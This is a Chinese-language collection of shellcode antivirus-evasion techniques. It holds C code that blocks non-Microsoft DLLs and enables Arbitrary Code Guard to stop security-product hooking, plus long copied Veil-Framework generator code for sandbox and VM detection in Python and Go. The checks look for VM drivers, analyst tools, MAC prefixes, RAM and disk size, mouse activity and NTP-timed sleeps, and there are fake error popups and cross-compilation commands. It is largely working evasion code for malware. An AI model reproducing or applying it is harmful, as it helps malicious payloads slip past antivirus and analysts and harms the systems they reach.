boy-hack
boy-hack copied to clipboard
boy-hack
shellcode 免杀技术整理
- 内存加载dll
- https://github.com/fancycode/MemoryModule
- 阻止dll
- 组织非微软签名dll注入
- https://www.anquanke.com/post/id/190344
- 限制条件: win8/win2012以上
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
policy.ProhibitDynamicCode = 1;
ZeroMemory(&si, sizeof(si));
si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
// Get the size of our PROC_THREAD_ATTRIBUTE_LIST to be allocated
InitializeProcThreadAttributeList(NULL, 1, 0, &size);
// Allocate memory for PROC_THREAD_ATTRIBUTE_LIST
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
GetProcessHeap(),
0,
size
);
// Initialise our list
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
// Enable blocking of non-Microsoft signed DLLs
DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
// Assign our attribute
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(policy), NULL, NULL);
- ACG(Arbitrary Code Guard)
- 阻止杀软进程hook我们的进程后在进程内部使用VirtualAlloc等函数修改内存空间 使其无法生成动态代码或修改现有的可执行代码.
PROCESS_MITIGATION_DYNAMIC_CODE_POLICY acg_policy;
ZeroMemory(&acg_policy, sizeof(acg_policy));
acg_policy.ProhibitDynamicCode = 1;
if (SetProcessMitigationPolicy(ProcessDynamicCodePolicy, &acg_policy, sizeof(acg_policy)) == false) {
MessageBoxA(NULL, "load testdll.dll error.", "error", MB_OK);
return 1;
}
- [x] VEIL-FRAMEWORK 研究
- https://www.veil-framework.com/
- https://github.com/Veil-Framework/Veil
版本变更历史
- 3.1 将内存权限从rwx变为 rw,再使用VirtualProtuct 改为 rx
- 3.0 加入
Ordnance,使用自己的生成器 https://github.com/Veil-Framework/Veil-Ordnance-t Evasion列出所有可用的逃逸选项
veil 检测技术整理
tools\evasion\evasion_common\gamemaker.py
虚拟dll检测
check_code += '\t' * num_tabs_required + 'import win32api\n'
check_code += '\t' * num_tabs_required + 'import win32process\n'
check_code += '\t' * num_tabs_required + evidenceof_sandbox + '= []\n'
# removed dbghelp.dll
check_code += '\t' * num_tabs_required + sandbox_dlls + ' = ["sbiedll.dll","api_log.dll","dir_watch.dll","pstorec.dll","vmcheck.dll","wpespy.dll"]\n'
check_code += '\t' * num_tabs_required + all_pids + '= win32process.EnumProcesses()\n'
check_code += '\t' * num_tabs_required + 'for ' + pid + ' in ' + all_pids + ':\n'
check_code += '\t' * num_tabs_required + '\ttry:\n'
check_code += '\t' * num_tabs_required + '\t\t' + hProcess + ' = win32api.OpenProcess(0x0410, 0, ' + pid + ')\n'
check_code += '\t' * num_tabs_required + '\t\ttry:\n'
check_code += '\t' * num_tabs_required + '\t\t\t' + curProcessDLLs + '= win32process.EnumProcessModules(' + hProcess + ')\n'
check_code += '\t' * num_tabs_required + '\t\t\tfor ' + dll + ' in ' + curProcessDLLs + ':\n'
check_code += '\t' * num_tabs_required + '\t\t\t\t' + dll_name + '= str(win32process.GetModuleFileNameEx(' + hProcess + ', ' + dll + ')).lower()\n'
check_code += '\t' * num_tabs_required + '\t\t\t\tfor ' + sandbox_dll + ' in '+ sandbox_dlls + ':\n'
check_code += '\t' * num_tabs_required + '\t\t\t\t\tif ' + sandbox_dll + ' in ' + dll_name + ':\n'
check_code += '\t' * num_tabs_required + '\t\t\t\t\t\tif ' + dll_name + ' not in ' + evidenceof_sandbox + ':\n'
check_code += '\t' * num_tabs_required + '\t\t\t\t\t\t\t' + evidenceof_sandbox + '.append(' + dll_name + ')\n'
check_code += '\t' * num_tabs_required + '\t\tfinally:\n'
check_code += '\t' * num_tabs_required + '\t\t\twin32api.CloseHandle(' + pid + ')\n'
check_code += '\t' * num_tabs_required + '\texcept:\n'
check_code += '\t' * num_tabs_required + '\t\tpass\n'
check_code += '\t' * num_tabs_required + 'if not ' + evidenceof_sandbox + ':\n'
最小内存
check_code += '\t' * num_tabs_required + 'import ctypes\n'
check_code += '\t' * num_tabs_required + 'class ' + class_name + ' (ctypes.Structure):\n'
check_code += '\t' * num_tabs_required + '\t_fields_ = [\n'
check_code += '\t' * num_tabs_required + '\t\t("dwLength", ctypes.c_ulong),\n'
check_code += '\t' * num_tabs_required + '\t\t("dwMemoryLoad", ctypes.c_ulong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullTotalPhys", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullAvailPhys", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullTotalPageFile", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullAvailPageFile", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullTotalVirtual", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("ullAvailVirtual", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t\t("sullAvailExtendedVirtual", ctypes.c_ulonglong),\n'
check_code += '\t' * num_tabs_required + '\t]\n'
check_code += '\t' * num_tabs_required + memory_status + ' = ' + class_name + '()\n'
check_code += '\t' * num_tabs_required + memory_status + '.dwLength = ctypes.sizeof(' + class_name + ')\n'
check_code += '\t' * num_tabs_required + 'ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(' + memory_status + '))\n'
check_code += '\t' * num_tabs_required + 'if ' + memory_status + '.ullTotalPhys/1073741824 > 3:\n'
鼠标点击轨迹
check_code += '\t' * num_tabs_required + 'import win32api\n'
check_code += '\t' * num_tabs_required + rand_counter + " = 0\n"
check_code += '\t' * num_tabs_required + minimum_clicks + " = " + evasion_payload.required_options["CLICKTRACK"][0] + "\n"
check_code += '\t' * num_tabs_required + 'while ' + rand_counter + ' < ' + minimum_clicks + ':\n'
check_code += '\t' * num_tabs_required + '\t' + left_click + ' = win32api.GetAsyncKeyState(1)\n'
check_code += '\t' * num_tabs_required + '\t' + right_click + ' = win32api.GetAsyncKeyState(2)\n'
check_code += '\t' * num_tabs_required + '\t' + 'if ' + left_click + ' % 2 == 1:\n'
check_code += '\t' * num_tabs_required + '\t\t' + rand_counter + ' += 1\n'
check_code += '\t' * num_tabs_required + '\t' + 'if ' + right_click + ' % 2 == 1:\n'
check_code += '\t' * num_tabs_required + '\t\t' + rand_counter + ' += 1\n'
check_code += '\t' * num_tabs_required + 'if ' + rand_counter + ' >= ' + minimum_clicks + ':\n'
虚拟文件检查
check_code += '\t' * num_tabs_required + 'import os\n'
check_code += '\t' * num_tabs_required + vmfiles_exist + ' = []\n'
check_code += '\t' * num_tabs_required + files_tocheck + " = [r'C:\windows\Sysnative\Drivers\Vmmouse.sys', r'C:\windows\Sysnative\Drivers\vm3dgl.dll', r'C:\windows\Sysnative\Drivers\vmdum.dll', r'C:\windows\Sysnative\Drivers\vm3dver.dll', r'C:\windows\Sysnative\Drivers\vmtray.dll', r'C:\windows\Sysnative\Drivers\vmci.sys', r'C:\windows\Sysnative\Drivers\vmusbmouse.sys', r'C:\windows\Sysnative\Drivers\vmx_svga.sys', r'C:\windows\Sysnative\Drivers\vmxnet.sys', r'C:\windows\Sysnative\Drivers\VMToolsHook.dll', r'C:\windows\Sysnative\Drivers\vmhgfs.dll', r'C:\windows\Sysnative\Drivers\vmmousever.dll', r'C:\windows\Sysnative\Drivers\vmGuestLib.dll', r'C:\windows\Sysnative\Drivers\VmGuestLibJava.dll', r'C:\windows\Sysnative\Drivers\vmscsi.sys', r'C:\windows\Sysnative\Drivers\VBoxMouse.sys', r'C:\windows\Sysnative\Drivers\VBoxGuest.sys', r'C:\windows\Sysnative\Drivers\VBoxSF.sys', r'C:\windows\Sysnative\Drivers\VBoxVideo.sys', r'C:\windows\Sysnative\vboxdisp.dll', r'C:\windows\Sysnative\vboxhook.dll', r'C:\windows\Sysnative\vboxmrxnp.dll', r'C:\windows\Sysnative\vboxogl.dll', r'C:\windows\Sysnative\vboxoglarrayspu.dll', r'C:\windows\Sysnative\vboxoglcrutil.dll', r'C:\windows\Sysnative\vboxoglerrorspu.dll', r'C:\windows\Sysnative\vboxoglfeedbackspu.dll', r'C:\windows\Sysnative\vboxoglpackspu.dll', r'C:\windows\Sysnative\vboxoglpassthroughspu.dll', r'C:\windows\Sysnative\vboxservice.exe', r'C:\windows\Sysnative\vboxtray.exe', r'C:\windows\Sysnative\VBoxControl.exe']"
check_code += '\t' * num_tabs_required + 'for ' + file_path + ' in ' + files_tocheck + ':\n'
check_code += '\t' * num_tabs_required + '\tif os.path.isfile(' + file_path + '):\n'
check_code += '\t' * num_tabs_required + '\t\t' + vmfiles_exist + '.append(' + file_path + ')'
check_code += '\t' * num_tabs_required + 'if not ' + vmfiles_exist + ':\n'
用户提示
check_code += '\t' * num_tabs_required + 'import ctypes\n'
check_code += '\t' * num_tabs_required + popup_title + ' = "System Error 0x18463832"\n'
check_code += '\t' * num_tabs_required + popup_message + ' = "Your system encountered an error, please click OK to proceed"\n'
check_code += '\t' * num_tabs_required + message_box + ' = ctypes.windll.user32.MessageBoxW\n'
check_code += '\t' * num_tabs_required + message_box + '(None, ' + popup_message + ', ' + popup_title + ', 0)\n'
check_code += '\t' * num_tabs_required + 'if True:\n'
沙盒处理
check_code += '\t' * num_tabs_required + 'import win32pdh\n'
check_code += '\t' * num_tabs_required + sandbox_exist + ' = []\n'
check_code += '\t' * num_tabs_required + bad_procs + ' = "vmsrvc", "tcpview", "wireshark", "visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"\n'
check_code += '\t' * num_tabs_required + '_, ' + current_processes + ' = win32pdh.EnumObjectItems(None,None,\'process\', win32pdh.PERF_DETAIL_WIZARD)\n'
check_code += '\t' * num_tabs_required + 'for ' + process + ' in ' + current_processes + ':\n'
check_code += '\t' * num_tabs_required + '\tfor ' + sandbox_proc + ' in ' + bad_procs + ':\n'
check_code += '\t' * num_tabs_required + '\t\tif ' + sandbox_proc + ' in str(' + process + '.lower()):\n'
check_code += '\t' * num_tabs_required + '\t\t\t' + sandbox_exist + '.append(' + process + ')\n'
check_code += '\t' * num_tabs_required + '\t\t\tbreak\n'
check_code += '\t' * num_tabs_required + 'if not ' + sandbox_exist + ':\n'
SLEEP
check_code += '\t' * num_tabs_required + 'from time import sleep\n'
check_code += '\t' * num_tabs_required + 'from socket import AF_INET, SOCK_DGRAM\n'
check_code += '\t' * num_tabs_required + 'import sys\n'
check_code += '\t' * num_tabs_required + 'import datetime\n'
check_code += '\t' * num_tabs_required + 'import time\n'
check_code += '\t' * num_tabs_required + 'import socket\n'
check_code += '\t' * num_tabs_required + 'import struct\n'
check_code += '\t' * num_tabs_required + 'client = socket.socket(AF_INET, SOCK_DGRAM)\n'
check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n'
check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n'
check_code += '\t' * num_tabs_required + rand_time_name + ' = datetime.datetime.fromtimestamp(struct.unpack("!12I",msg)[10] - 2208988800)\n'
check_code += '\t' * num_tabs_required + 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n'
check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n'
check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n'
check_code += '\t' * num_tabs_required + 'if ((datetime.datetime.fromtimestamp((struct.unpack("!12I",msg)[10] - 2208988800)) - ' + rand_time_name + ').seconds >= ' + evasion_payload.required_options["SLEEP"][0] + '):\n'
Go语言对应处理代码
rand_username = evasion_helpers.randomString()
rand_error1 = evasion_helpers.randomString()
rand_hostname = evasion_helpers.randomString()
rand_error2 = evasion_helpers.randomString()
rand_processor = evasion_helpers.randomString()
rand_domain = evasion_helpers.randomString()
if evasion_payload.required_options["USERNAME"][0].lower() != "x":
check_code += rand_username + ", " + rand_error1 + " := user.Current()\n"
check_code += "if " + rand_error1 + " != nil {\n"
check_code += "os.Exit(1)}\n"
check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + evasion_payload.required_options["USERNAME"][0] + "\")) {\n"
num_tabs_required += 1
if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":
check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n"
check_code += "if " + rand_error2 + " != nil {\n"
check_code += "os.Exit(1)}\n"
check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + evasion_payload.required_options["HOSTNAME"][0] + "\")) {\n"
num_tabs_required += 1
if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":
check_code += rand_processor + " := runtime.NumCPU()\n"
check_code += "if " + rand_processor + " >= " + evasion_payload.required_options["PROCESSORS"][0] + " {\n"
num_tabs_required += 1
if evasion_payload.required_options["SLEEP"][0].lower() != "x":
check_code += 'type ntp_struct struct {FirstByte,A,B,C uint8;D,E,F uint32;G,H uint64;ReceiveTime uint64;J uint64}\n'
check_code += 'sock,_ := net.Dial("udp", "us.pool.ntp.org:123");sock.SetDeadline(time.Now().Add((6*time.Second)));defer sock.Close()\n'
check_code += 'ntp_transmit := new(ntp_struct);ntp_transmit.FirstByte=0x1b\n'
check_code += 'binary.Write(sock, binary.BigEndian, ntp_transmit);binary.Read(sock, binary.BigEndian, ntp_transmit)\n'
check_code += 'val := time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((ntp_transmit.ReceiveTime >> 32)*1000000000)))\n'
check_code += 'time.Sleep(time.Duration(' + evasion_payload.required_options["SLEEP"][0] + '*1000) * time.Millisecond)\n'
check_code += 'newsock,_ := net.Dial("udp", "us.pool.ntp.org:123");newsock.SetDeadline(time.Now().Add((6*time.Second)));defer newsock.Close()\n'
check_code += 'second_transmit := new(ntp_struct);second_transmit.FirstByte=0x1b\n'
check_code += 'binary.Write(newsock, binary.BigEndian, second_transmit);binary.Read(newsock, binary.BigEndian, second_transmit)\n'
check_code += 'if int(time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((second_transmit.ReceiveTime >> 32)*1000000000))).Sub(val).Seconds()) >= ' + evasion_payload.required_options["SLEEP"][0] + ' {'
num_tabs_required += 1
if evasion_payload.required_options["UTCCHECK"][0].lower() != "false":
tzone_abbrev = evasion_helpers.randomString()
tzone_offset = evasion_helpers.randomString()
check_code += '_, ' + tzone_offset + ' := time.Now().Zone()\n'
check_code += 'if ' + tzone_offset + ' != 0 {\n'
num_tabs_required += 1
if evasion_payload.required_options["USERPROMPT"][0].lower() != "false":
title_box = evasion_helpers.randomString()
message_box = evasion_helpers.randomString()
user32_dll = evasion_helpers.randomString()
messagebox_w = evasion_helpers.randomString()
check_code += 'var ' + title_box + ' = "System Error Encountered"\n'
check_code += 'var ' + message_box + ' = "System error 0x831d83a4 - Press OK to continue"\n'
check_code += 'var ' + user32_dll + ' = syscall.NewLazyDLL("user32.dll")\n'
check_code += 'var ' + messagebox_w + ' = ' + user32_dll + '.NewProc("MessageBoxW")\n'
check_code += messagebox_w + '.Call(0,\n'
check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(' + message_box + '))),\n'
check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(' + title_box + '))),\n'
check_code += '0)\n'
check_code += 'if true {\n'
num_tabs_required += 1
if evasion_payload.required_options["RAMCHECK"][0].lower() != 'false':
memstatusx = evasion_helpers.randomString()
kernel32_dll = evasion_helpers.randomString()
globalmem_status = evasion_helpers.randomString()
mem_info = evasion_helpers.randomString()
check_code += 'type ' + memstatusx + ' struct {\n'
check_code += '\tdwLength\tuint32\n'
check_code += '\tdwMemoryLoad\tuint32\n'
check_code += '\tullTotalPhys\tuint64\n'
check_code += '\tullAvailPhys\tuint64\n'
check_code += '\tullTotalPageFile\tuint64\n'
check_code += '\tullAvailPageFile\tuint64\n'
check_code += '\tullTotalVirtual\tuint64\n'
check_code += '\tullAvailVirtual\tuint64\n'
check_code += '\tullAvailExtendedVirtual\tuint64\n'
check_code += '}\n'
check_code += 'var ' + kernel32_dll + ' = syscall.NewLazyDLL("kernel32.dll")\n'
check_code += 'var ' + globalmem_status + ' = ' + kernel32_dll + '.NewProc("GlobalMemoryStatusEx")\n'
check_code += 'var ' + mem_info + ' ' + memstatusx + '\n'
check_code += mem_info + '.dwLength = uint32(unsafe.Sizeof(' + mem_info + '))\n'
check_code += globalmem_status + '.Call(uintptr(unsafe.Pointer(&' + mem_info + ')))\n'
check_code += 'if (' + mem_info + '.ullTotalPhys/1073741824 >= 3) {\n'
num_tabs_required += 1
if evasion_payload.required_options["PROCCHECK"][0].lower() != 'false':
kernel32 = evasion_helpers.randomString()
createtoolhelp = evasion_helpers.randomString()
proc32first = evasion_helpers.randomString()
proc32next = evasion_helpers.randomString()
closehandle = evasion_helpers.randomString()
procentry32 = evasion_helpers.randomString()
ev_of_sandbox = evasion_helpers.randomString()
sbox_procs = evasion_helpers.randomString()
hproc_snap = evasion_helpers.randomString()
exe_names = evasion_helpers.randomString()
pe32 = evasion_helpers.randomString()
ret_val = evasion_helpers.randomString()
exe = evasion_helpers.randomString()
sbox_process = evasion_helpers.randomString()
check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'
check_code += 'var ' + createtoolhelp + ' = ' + kernel32 + '.NewProc("CreateToolhelp32Snapshot")\n'
check_code += 'var ' + proc32first + ' = ' + kernel32 + '.NewProc("Process32FirstW")\n'
check_code += 'var ' + proc32next + ' = ' + kernel32 + '.NewProc("Process32NextW")\n'
check_code += 'var ' + closehandle + ' = ' + kernel32 + '.NewProc("CloseHandle")\n'
check_code += 'type ' + procentry32 + ' struct {\n'
check_code += '\tdwSize\t\tuint32\n'
check_code += '\tcntUsage\t\tuint32\n'
check_code += '\tth32ProcessID\t\tuint32\n'
check_code += '\tth32DefaultHeapID\t\tuintptr\n'
check_code += '\tth32ModuleID\t\tuint32\n'
check_code += '\tcntThreads\t\tuint32\n'
check_code += '\tth32ParentProcessID\t\tuint32\n'
check_code += '\tpcPriClassBase\t\tint32\n'
check_code += '\tdwFlags\t\tuint32\n'
check_code += '\tszExeFile\t\t[260]uint16\n'
check_code += '}\n'
check_code += ev_of_sandbox + ' := make([]string, 0)\n'
check_code += sbox_procs + " := [...]string{`vmsrvc`, `tcpview`, `wireshark`, `visual basic`, `fiddler`, `vmware`, `vbox`, `process explorer`, `autoit`, `vboxtray`, `vmtools`, `vmrawdsk`, `vmusbmouse`, `vmvss`, `vmscsi`, `vmxnet`, `vmx_svga`, `vmmemctl`, `df5serv`, `vboxservice`, `vmhgfs`}\n"
check_code += hproc_snap + ', _, _ := ' + createtoolhelp + '.Call(2,0)\n'
check_code += 'defer ' + closehandle + '.Call(' + hproc_snap + ')\n'
check_code += exe_names + ' := make([]string, 0, 100)\n'
check_code += 'var ' + pe32 + ' ' + procentry32 + '\n'
check_code += pe32 + '.dwSize = uint32(unsafe.Sizeof(' + pe32 + '))\n'
check_code += proc32first + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'
check_code += 'for {\n'
check_code += '\t' + exe_names + ' = append(' + exe_names + ', syscall.UTF16ToString(' + pe32 + '.szExeFile[:260]))\n'
check_code += '\t' + ret_val + ', _, _ := ' + proc32next + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'
check_code += '\tif ' + ret_val + ' == 0 {\n'
check_code += '\t\tbreak\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += 'for _, ' + exe + ' := range ' + exe_names + ' {\n'
check_code += '\tfor _, ' + sbox_process + ' := range ' + sbox_procs + ' {\n'
check_code += '\t\tif (strings.Contains(strings.ToLower(' + exe + '), strings.ToLower(' + sbox_process + '))) {\n'
check_code += '\t\t\t' + ev_of_sandbox + ' = append(' + ev_of_sandbox + ', ' + exe + ')\n'
check_code += '\t\t}\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += 'if len(' + ev_of_sandbox + ') == 0 {\n'
num_tabs_required += 1
if evasion_payload.required_options["MINPROCS"][0].lower() != 'x':
kernel32 = evasion_helpers.randomString()
createtoolhelp = evasion_helpers.randomString()
proc32first = evasion_helpers.randomString()
proc32next = evasion_helpers.randomString()
closehandle = evasion_helpers.randomString()
min_processes = evasion_helpers.randomString()
procentry32 = evasion_helpers.randomString()
hproc_snap = evasion_helpers.randomString()
exe_names = evasion_helpers.randomString()
pe32 = evasion_helpers.randomString()
ret_val = evasion_helpers.randomString()
exe = evasion_helpers.randomString()
count_running_procs = evasion_helpers.randomString()
wut = evasion_helpers.randomString()
check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'
check_code += 'var ' + createtoolhelp + ' = ' + kernel32 + '.NewProc("CreateToolhelp32Snapshot")\n'
check_code += 'var ' + proc32first + ' = ' + kernel32 + '.NewProc("Process32FirstW")\n'
check_code += 'var ' + proc32next + ' = ' + kernel32 + '.NewProc("Process32NextW")\n'
check_code += 'var ' + closehandle + ' = ' + kernel32 + '.NewProc("CloseHandle")\n'
check_code += 'type ' + procentry32 + ' struct {\n'
check_code += '\tdwSize\t\tuint32\n'
check_code += '\tcntUsage\t\tuint32\n'
check_code += '\tth32ProcessID\t\tuint32\n'
check_code += '\tth32DefaultHeapID\t\tuintptr\n'
check_code += '\tth32ModuleID\t\tuint32\n'
check_code += '\tcntThreads\t\tuint32\n'
check_code += '\tth32ParentProcessID\t\tuint32\n'
check_code += '\tpcPriClassBase\t\tint32\n'
check_code += '\tdwFlags\t\tuint32\n'
check_code += '\tszExeFile\t\t[260]uint16\n'
check_code += '}\n'
check_code += min_processes + ' := ' + evasion_payload.required_options["MINPROCS"][0] + '\n'
check_code += hproc_snap + ', _, _ := ' + createtoolhelp + '.Call(2,0)\n'
check_code += 'defer ' + closehandle + '.Call(' + hproc_snap + ')\n'
check_code += exe_names + ' := make([]string, 0, 100)\n'
check_code += 'var ' + pe32 + ' ' + procentry32 + '\n'
check_code += pe32 + '.dwSize = uint32(unsafe.Sizeof(' + pe32 + '))\n'
check_code += proc32first + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'
check_code += 'for {\n'
check_code += '\t' + exe_names + ' = append(' + exe_names + ', syscall.UTF16ToString(' + pe32 + '.szExeFile[:260]))\n'
check_code += '\t' + ret_val + ', _, _ := ' + proc32next + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'
check_code += '\tif ' + ret_val + ' == 0 {\n'
check_code += '\t\tbreak\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += count_running_procs + ' := 0\n'
check_code += 'for _, ' + exe + ' := range ' + exe_names + ' {\n'
check_code += "\tif " + exe + " == \"\" {\n"
check_code += "\t\tos.Exit(1)}\n"
check_code += '\t' + count_running_procs + ' += 1\n'
check_code += '}\n'
check_code += 'if (' + count_running_procs + ' >= ' + min_processes + ') {\n'
num_tabs_required += 1
if evasion_payload.required_options["BADMACS"][0].lower() != 'false':
evd_sandbox = evasion_helpers.randomString()
bad_addrs = evasion_helpers.randomString()
nics = evasion_helpers.randomString()
single_nic = evasion_helpers.randomString()
bad_mac = evasion_helpers.randomString()
check_code += evd_sandbox + ' := make([]net.HardwareAddr, 0)\n'
check_code += bad_addrs + ' := [...]string{`00:0C:29`, `00:1C:14`, `00:50:56`, `00:05:69`, `08:00:27`}\n'
check_code += nics + ', _ := net.Interfaces()\n'
check_code += 'for _, ' + single_nic + ' := range ' + nics + ' {\n'
check_code += '\tfor _, ' + bad_mac + ' := range ' + bad_addrs + ' {\n'
check_code += '\t\tif strings.Contains(strings.ToLower(' + single_nic + '.HardwareAddr.String()), strings.ToLower(' + bad_mac + ')) {\n'
check_code += '\t\t\t' + evd_sandbox + ' = append(' + evd_sandbox + ', ' + single_nic + '.HardwareAddr)\n'
check_code += '\t\t}\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += 'if len(' + evd_sandbox + ') == 0 {\n'
num_tabs_required += 1
if evasion_payload.required_options["CLICKTRACK"][0].lower() != 'x':
usr32 = evasion_helpers.randomString()
getkey_state = evasion_helpers.randomString()
counter = evasion_helpers.randomString()
min_clicks = evasion_helpers.randomString()
lft_click = evasion_helpers.randomString()
rght_click = evasion_helpers.randomString()
check_code += 'var ' + usr32 + ' = syscall.NewLazyDLL("user32.dll")\n'
check_code += 'var ' + getkey_state + ' = ' + usr32 + '.NewProc("GetAsyncKeyState")\n'
check_code += 'var ' + counter + ' = 0\n'
check_code += 'var ' + min_clicks + ' = ' + evasion_payload.required_options["CLICKTRACK"][0] + '\n'
check_code += 'for ' + counter + ' < ' + min_clicks + ' {\n'
check_code += '\t' + lft_click + ', _, _ := ' + getkey_state + '.Call(uintptr(0x1))\n'
check_code += '\t' + rght_click + ', _, _ := ' + getkey_state + '.Call(uintptr(0x2))\n'
check_code += '\tif ' + lft_click + ' % 2 == 1 {\n'
check_code += '\t\t' + counter + ' += 1\n'
check_code += '\t}\n'
check_code += '\tif ' + rght_click + ' % 2 == 1 {\n'
check_code += '\t\t' + counter + ' += 1\n'
check_code += '\t}\n'
check_code += '}\n'
check_code += 'if true {\n'
num_tabs_required += 1
if evasion_payload.required_options["CURSORCHECK"][0].lower() != 'false':
usr32 = evasion_helpers.randomString()
cursor_position = evasion_helpers.randomString()
point_struct = evasion_helpers.randomString()
secs = evasion_helpers.randomString()
point_var1 = evasion_helpers.randomString()
point_var2 = evasion_helpers.randomString()
check_code += 'type ' + point_struct + ' struct {\n'
check_code += '\tx, y int32\n'
check_code += '}\n'
check_code += 'var ' + usr32 + ' = syscall.NewLazyDLL("user32.dll")\n'
check_code += 'var ' + cursor_position + ' = ' + usr32 + '.NewProc("GetCursorPos")\n'
check_code += secs + ' := 60\n'
check_code += point_var1 + ' := ' + point_struct + '{}\n'
check_code += cursor_position + '.Call(uintptr(unsafe.Pointer(&' + point_var1 + ')))\n'
check_code += 'time.Sleep(time.Duration(' + secs + ' * 1000) * time.Millisecond)\n'
check_code += point_var2 + ' := ' + point_struct + '{}\n'
check_code += cursor_position + '.Call(uintptr(unsafe.Pointer(&' + point_var2 + ')))\n'
check_code += 'if ' + point_var1 + '.x - ' + point_var2 + '.x == 0 && ' + point_var1 + '.y - ' + point_var2 + '.y == 0 {\n'
num_tabs_required += 1
if evasion_payload.required_options["DISKSIZE"][0].lower() != 'x':
min_disk_size = evasion_helpers.randomString()
kernel32 = evasion_helpers.randomString()
getDiskFreeSpaceEx = evasion_helpers.randomString()
lpFreeBytesAvailable = evasion_helpers.randomString()
lpTotalNumberOfBytes = evasion_helpers.randomString()
lpTotalNumberOfFreeBytes = evasion_helpers.randomString()
cur_disk_size = evasion_helpers.randomString()
check_code += min_disk_size + ' := float32(' + evasion_payload.required_options["DISKSIZE"][0] + ')\n'
check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'
check_code += 'var ' + getDiskFreeSpaceEx + ' = ' + kernel32 + '.NewProc("GetDiskFreeSpaceExW")\n'
check_code += lpFreeBytesAvailable + ' := int64(0)\n'
check_code += '\t' + lpTotalNumberOfBytes + ' := int64(0)\n'
check_code += '\t' + lpTotalNumberOfFreeBytes + ' := int64(0)\n'
check_code += getDiskFreeSpaceEx + '.Call(\n'
check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr("C:"))),\n'
check_code += '\tuintptr(unsafe.Pointer(&' + lpFreeBytesAvailable + ')),\n'
check_code += '\tuintptr(unsafe.Pointer(&' + lpTotalNumberOfBytes + ')),\n'
check_code += '\tuintptr(unsafe.Pointer(&' + lpTotalNumberOfFreeBytes + ')))\n'
check_code += cur_disk_size + ' := float32(' + lpTotalNumberOfBytes + ')/1073741824\n'
check_code += 'if (' + cur_disk_size + ' > ' + min_disk_size + ') {\n'
num_tabs_required += 1
# Return check information
return check_code, num_tabs_required
Veil 各平台编译代码
- ruby
os.system('WINEPREFIX=' + settings.WINEPREFIX + ' wine ' + settings.WINEPREFIX + '/drive_c/Ruby187/bin/ruby.exe ' + settings.WINEPREFIX + '/drive_c/Ruby187/bin/ocra --windows '+ source_code_filepath + ' --output ' + executable_filepath + ' ' + settings.WINEPREFIX + '/drive_c/Ruby187/lib/ruby/gems/1.8/gems/win32-api-1.4.8-x86-mingw32/lib/win32/*')
- go
os.system( 'env GOROOT={0} GOOS=windows GOARCH=386 {0}/bin/go build -ldflags "-s -w -H=windowsgui" -v -o {1} {2}'.format(settings.GOLANG_PATH, executable_filepath, source_code_filepath) )
- cs
os.system('mcs -platform:x86 -target:winexe ' + source_code_filepath + ' -out:' + executable_filepath)
- c
os.system('i686-w64-mingw32-gcc -Wl,-subsystem,windows ' + source_code_filepath + ' -o ' + executable_filepath + " -lwsock32")
其他payload
- 将exe转换为war(java)
tools\evasion\payloads\auxiliary\coldwar_wrapper.py
- 将powershell转换为macro
tools\evasion\payloads\auxiliary\macro_converter.py
Veil-Ordnance
Veil-Ordnance实现了生成x86格式的msf payload,原理是进行字节码替换
- https://github.com/Veil-Framework/Veil-Ordnance/blob/master/payloads/x86/init.py 实现了xor编码器
